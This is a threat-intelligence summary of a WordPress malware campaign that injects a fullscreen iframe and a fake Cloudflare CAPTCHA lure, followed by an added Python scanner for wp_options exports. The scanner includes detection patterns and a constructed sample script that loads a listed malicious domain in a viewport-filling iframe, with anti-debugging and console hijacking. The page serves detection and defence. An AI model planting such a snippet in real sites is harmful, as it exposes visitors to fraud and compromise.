Malicious JavaScript Injects Fullscreen Iframe On a WordPress Website

A JavaScript-based malware campaign has been found on compromised WordPress websites. The injected script creates a fullscreen iframe that loads content from suspicious external domains, forcing visitors to view unsolicited content for ad fraud, traffic generation, or social engineering. The infection was stored in the WordPress wp_options database table and was planted through the WPCode plugin. The script uses evasion techniques such as anti-debugging, function hijacking, and localStorage abuse, and it only fires for Windows users on specific browsers. Those users are shown a fake Cloudflare CAPTCHA page that instructs them to run a PowerShell command. Beyond disrupting the user experience, the campaign exposes visitors to system compromise if that command is executed and damages the reputation of the affected website.

Author: AlienVault

Related Tags:
powershell exploitation

wpcode plugin

iframe injection

anti-debugging

T1552.003

T1608.004

T1204.001

WordPress

fake captcha

Associated Indicators:
wanderclean.com

wallpaper-engine.pro

weathersnoop.com

cdnstat.net

ampunshifu.org

http://180.178.189.7/mycaptcha.html

180.178.189.7
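A practical way to act on the summary and the indicators above is to scan a site's options table for both the listed domains and the behavioural traits the summary names (fullscreen iframe, anti-debugging, function hijacking, localStorage checks, Windows targeting). The following is an added example written for this page, not code from the pulse, AlienVault or the original research. It assumes the options table has been exported as (option_name, option_value) pairs (for instance with WP-CLI's `wp option list --format=json`); the function names, the regular expressions and the sample rows are assumptions for illustration, and the rows are constructed, not real site data.

```python
"""Hunt for the injected-iframe campaign in a WordPress wp_options export.

Added example, not code from the original pulse or the original researchers.
Assumes the options table is available as (option_name, option_value) pairs,
e.g. the output of WP-CLI's `wp option list --format=json`.
"""
import re

# Indicators as listed on this page.
IOC_DOMAINS = {
    "wanderclean.com", "wallpaper-engine.pro", "weathersnoop.com",
    "cdnstat.net", "ampunshifu.org", "180.178.189.7",
}


def _rx(pattern):
    return re.compile(pattern, re.I | re.S)


# Behavioural signals named in the summary. The patterns are assumptions about
# how such code typically looks, not signatures extracted from the campaign.
_FIXED_OR_VIEWPORT = _rx(r"position\s*[:=]\s*['\"]?fixed|100\s*(?:vw|vh)")
_HIJACK = _rx(r"\b(?:console\.\w+|window\.open|setTimeout|setInterval|"
              r"Function\.prototype\.\w+|document\.write)\s*=\s*(?!=)")
_ANTIDEBUG = _rx(r"\bdebugger\b|outerWidth\s*-\s*innerWidth|devtools")
_LOCALSTORAGE = _rx(r"\blocalStorage\s*[.\[]")
_NAVIGATOR = _rx(r"navigator\.(?:userAgent|platform|userAgentData)")
_WINDOWS = _rx(r"\bWin(?:dows|32|64)\b")
_LURE = _rx(r"cloudflare.{0,200}(?:captcha|verify|human)|powershell")


def matched_iocs(text):
    """Return the page's indicators that appear verbatim in the text."""
    low = text.lower()
    return sorted(d for d in IOC_DOMAINS if d in low)


def signals_for(text):
    """Sorted list of signal labels triggered by one option value."""
    checks = {
        "fullscreen_iframe": "iframe" in text.lower()
                             and bool(_FIXED_OR_VIEWPORT.search(text)),
        "function_hijacking": bool(_HIJACK.search(text)),
        "anti_debugging": bool(_ANTIDEBUG.search(text)),
        "localstorage": bool(_LOCALSTORAGE.search(text)),
        "os_targeting": bool(_NAVIGATOR.search(text)) and bool(_WINDOWS.search(text)),
        "fake_captcha_lure": bool(_LURE.search(text)),
        "ioc_domain": bool(matched_iocs(text)),
    }
    return sorted(label for label, hit in checks.items() if hit)


def is_suspicious(labels, min_signals=2):
    """A known indicator alone is enough; otherwise require several evasion traits."""
    return "ioc_domain" in labels or len(labels) >= min_signals


def scan_option_rows(rows):
    """Map option_name -> signal labels for every row that triggers at least one."""
    findings = {}
    for name, value in rows:
        labels = signals_for(value or "")
        if labels:
            findings[name] = labels
    return findings


# Constructed sample rows (not real site data). The last one mimics the
# behaviour described in the summary; the others are benign look-alikes
# that a naive "contains iframe" or "contains console" check would flag.
SAMPLE_ROWS = [
    ("siteurl", "https://example.com"),
    ("footer_embed", '<iframe width="560" height="315" allowfullscreen '
                     'src="https://www.youtube.com/embed/abc"></iframe>'),
    ("footer_js", 'console.log("hello");'),
    ("injected_snippet", """<script>(function(){
  if(!/Windows/.test(navigator.userAgent))return;
  if(localStorage.getItem("seen"))return;
  setInterval(function(){debugger;},100);
  console.log=function(){};
  var f=document.createElement("iframe");
  f.src="https://wanderclean.com/";
  f.style.position="fixed";f.style.top=0;f.style.left=0;
  f.style.width="100vw";f.style.height="100vh";f.style.zIndex=2147483647;
  document.body.appendChild(f);
  localStorage.setItem("seen","1");
})();</script>"""),
]

if __name__ == "__main__":
    for name, labels in scan_option_rows(SAMPLE_ROWS).items():
        verdict = "SUSPICIOUS" if is_suspicious(labels) else "review"
        print(f"{verdict:10} {name}: {', '.join(labels)}")
```

The domain match is deliberately treated as sufficient on its own, while the behavioural traits only raise a finding in combination: a single `localStorage` call or a lone iframe is common in legitimate snippets, but anti-debugging plus a hijacked `console.log` plus a fixed, viewport-sized iframe rarely is. Because the lure page itself is served from the remote domain rather than stored in the database, the `fake_captcha_lure` check will usually fire on captured page content, not on the wp_options row.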